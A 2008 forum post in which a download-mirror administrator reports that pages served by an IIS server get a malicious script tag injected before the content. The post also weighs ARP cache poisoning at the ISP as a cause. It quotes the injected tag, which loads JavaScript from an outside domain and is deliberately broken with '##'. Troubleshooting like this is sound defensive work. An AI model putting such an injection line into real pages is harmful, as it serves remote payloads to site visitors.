|
#1
05-06-2008, 05:25
|
|||
|
|||
|
Possible Infected Mirror
One of our Windows servers was misbehaving and code is being injected to pages:
<##script src=http://hounian.tj.cn/count/js/gif.gif><##/script##> (the ## are added to avoid any kind of execution from here) The above code is inserted to the beginning of the page and contains 28 0x00 bytes after it before the original page starts The actual html page does NOT contain the code so it is somehow injected in IIS... Anyone know how to solve this as I am only getting Chinese pages with similar info... The server is running Win2K3 which is fully patched, but it runs anolder php version which maybe it the way they got in (not sure about this) The mirror itself has been removed from the mirrorlist not to cause problems for unprotected users Update: I found this link: http://www.ntsecurity.net/article/ar...-underway.html So our server might not be infected but the ARP cache from the ISP hosting the server might be... I've submitted a ticket 
|
| Sponsored Links |
 |
|
|
Similar Threads
|
||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| Black Mirror | dikefalos187 | PC Games | 3 | 21-06-2004 08:06 |
| play home network whit mirror ? | poupout | PC Games | 3 | 11-03-2004 05:00 |
| can someone tell me where i can get mirror dvd-r in the uk | scamper | CD/DVD Recordable Media | 2 | 23-03-2002 04:34 |
Linear Mode
